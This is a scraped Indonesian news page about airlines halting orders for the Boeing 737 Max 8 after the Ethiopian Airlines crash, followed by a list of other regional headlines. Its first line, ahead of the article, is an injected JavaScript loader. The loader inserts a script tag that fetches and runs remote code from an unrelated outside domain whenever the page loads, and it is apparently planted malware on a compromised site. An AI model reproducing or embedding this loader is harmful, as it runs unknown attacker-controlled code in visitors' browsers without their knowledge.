(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Bisnis

Seluruh Maskapai di Dunia Kompak Tunda Pesan Pesawat ke Boeing


Seluruh maskapai penerbangan secara global telah sepenuhnya melakukan penundaan pesanan Boeing 737 Max 8. Hal tersebut terbukti dengan Boeing yang menurunkan pesanan pesawat jenis 737 Max tersebut.

Dikutip CNN Business pada Selasa (9/4/2019) Boeing telah merilis data bahwa terdapat 10 pesawat pesanan dalam dua bulan pertama di tahun 2019.

Sampai terjadinya kecelakaan jatuhnya Ethiopian Airlines yang menggunakan Boeing 737 Max 8, selanjutnya tidak ada lagi pesanan di Maret 2019.

Jumlah ini menurun drastis dibanding kuartal pertama tahun 2018 yang bisa mencapai 112 pesanan. Pesanan tersebut berasal dari Southwest Airlines sebanyak 40 jet dan Ryanair sebanyak 25 pesanan.

Richard Aboulafa analisis dari Teal Group menjelaskan, kecelakaan fatal pada Ethiopian Airlines menyebabkan penurunan penjualan.

Ia menghubungkan, banyak perubahan setelah terjadinya kecelakaan Ethiopian Airlines dengan sejumlah pesanan untuk generasi berikutnya yang dipesan baik Boeing maupun kompetitor yakni Airbus.

Menurutnya pesanan pada Airbus lebih buruk pada kuartal pertama di tahun 2019 dibandingkan Boeing 737 Max 8.

Boeing mencatat sudah ada sekitar 5.000 pesanan untuk 737 Max 8 dalam pembukuannya. Sejauh ini hanya satu maskapai yang langsung membatalkan pemesanan setelah penangguhan penerbangan sebanyak 50 pesawat yang dilakukan oleh Garuda Indonesia.

Saat ini, setelah kecelakaan yang menewaskan 346 orang pada kecelakaan Ethiopian Airlines dan Lion Air, Boeing kemudian menghentikan pengiriman dan mengumumkan pada minggu lalu bahwa akan mengurangi produksi pesawat 737 Max.

Pihaknya akan berfokus pada penyelidikan kecelakaan yang merupakan sistem keselamatan otomatis pesawat yang saat ini masih dalam pengembangan perbaikan perangkat lunak. (suara.com)

 

Reporter:suara.com
Editor:KK

Desy Arfianty

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

9 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

9 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

9 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

13 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

16 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

16 jam ago

This website uses cookies.